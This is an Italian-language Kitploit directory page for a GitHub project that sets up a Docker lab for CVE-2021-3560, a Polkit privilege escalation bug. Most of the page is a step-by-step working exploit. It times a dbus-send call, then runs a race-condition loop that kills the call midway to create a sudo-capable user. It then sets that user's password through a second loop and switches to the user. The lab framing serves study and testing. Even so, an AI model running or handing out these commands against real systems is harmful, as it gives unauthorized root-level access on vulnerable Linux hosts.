Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-3560-Polkit-Privilege-Escalation — Exploit basato su Docker per CVE-2021-3560 (escalation dei privilegi di Polkit) con istruzioni passo-passo per creare un utente sudo tramite una race condition in dbus-send. | Kitploit
Strumenti/GitHubGitHub/markyu0401/cve-2021-3560-polkit-privilege-escalation
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneRed Teaming
GitHubmarkyu0401/cve-2021-3560-polkit-privilege-escalation

CVE-2021-3560-Polkit-Privilege-Escalation

Exploit basato su Docker per CVE-2021-3560 (escalation dei privilegi di Polkit) con istruzioni passo-passo per creare un utente sudo tramite una race condition in dbus-send.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
2 anni faNon ancora revisionato

CVE-2021-3560-Polkit-Privilege-Escalation

di Mark, Qingchen Yu Per creare il container con

root@kitploit:~
docker build -t <tag immagine a tua scelta> .

Per eseguire il container

root@kitploit:~
docker run -it <nome tag immagine>
  1. inizia con start.sh

  2. Misura il tempo di esecuzione: Nota il tempo 'real' e calcola la metà.

    root@kitploit:~
    time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
    
  3. Crea un utente con privilegi sudo: Sostituisci X.XXX con la metà del tempo 'real' di cui sopra perché vogliamo che il processo venga interrotto a metà. il comando verrà eseguito come un ciclo di 10000 volte. Potresti dover eseguire questo passaggio più volte.

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
    
  4. Verifica la creazione dell'utente id samurai Dovrebbe mostrare che l'utente samurai esiste e visualizzare i suoi permessi. Esegui di nuovo il passaggio 2 se non.

  5. Genera l'hash della password: in questo caso, la password sarebbe 'iamsamurai' Nota l'hash generato.

    root@kitploit:~
    openssl passwd -5 iamsamurai
    
  6. Imposta la password per il nuovo utente: Sostituisci X.XXX con la durata del sleep e Password Hash con l'hash del passaggio 4. Sostituisci UUUU con l'ID utente di 'samurai'.

    root@kitploit:~
    for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
    
  7. Passa al nuovo utente con la password creata al passaggio 4. su - samurai

    Ora dovresti essere in grado di usare 'sudo con questo utente'.

Scarica lo strumento